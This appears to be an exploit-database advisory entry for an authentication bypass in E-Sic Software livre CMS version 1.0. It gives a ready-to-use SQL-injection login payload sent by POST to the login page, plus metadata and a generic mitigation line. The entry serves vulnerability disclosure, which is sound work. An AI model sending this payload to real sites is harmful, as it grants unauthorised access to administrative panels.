vendor:
E-Sic Software livre CMS
by:
Elber Tavares
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: E-Sic Software livre CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:software_publico:e-sic_livre
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux, Windows 7, 8.1, 10 - Firefox
2017
E-Sic Software livre CMS – Autentication Bypass
The vulnerability is in the login area of e-sic, where an attacker can enter the panel without providing valid credentials by using some parameters such as username and password. The PoC for this exploit is to send a POST request to http://vulnsite/esic/index/index.php with the data login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar
Mitigation:
The best way to mitigate this vulnerability is to ensure that authentication is properly implemented and that all user input is properly validated.